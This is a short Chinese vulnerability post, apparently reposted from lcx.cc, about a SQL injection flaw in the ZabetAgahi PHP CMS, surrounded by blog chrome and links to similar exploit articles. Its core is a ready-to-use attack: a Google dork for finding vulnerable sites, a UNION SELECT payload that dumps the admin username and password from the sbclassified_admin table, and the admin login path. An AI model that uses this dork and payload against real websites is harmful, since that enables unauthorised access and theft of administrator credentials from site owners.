ZabetAgahi SQL 注入漏洞

admin

102737
文章

87
评论

2021年4月3日19:44:02评论24 views字数 614阅读2分2秒阅读模式

By：追心

漏洞说明：

ZabetAgahi是一款国外的基于PHP+MYSQL的内容管理系统，ZabetAgahi 由于设计上的缺陷，导致SQL注入漏洞。

漏洞类型：

sql注入、sql盲注、脚本盲注、注入漏洞

谷歌关键词：

inurl:ZabetAgahiCategory.php?cid=

漏洞文件：

ZabetAgahiCategory.php

漏洞测试：

http://www.baidu.com/ZabetAgahiCategory.php?cid=[SQL]
http://www.baidu.com/ZabetAgahiCategory.php?cid=-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--

后台地址：

http://www.baidu.com/AdminZabetAgahi/AdminZabetAgahiHome.php

文章来源于lcx.cc:ZabetAgahi SQL 注入漏洞

相关推荐: Html 使用Java脚本获取当前页面所有脚本地址

Html 使用Java脚本获取当前页面所有脚本地址： javascript:var h="";for(i=0; i";x=window.open("about");x.document.write(h); 使用方法，极其简单。当打开指定页面后，在地址栏…

左青龙
微信扫一扫

右白虎
微信扫一扫

ZabetAgahi SQL 注入漏洞

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信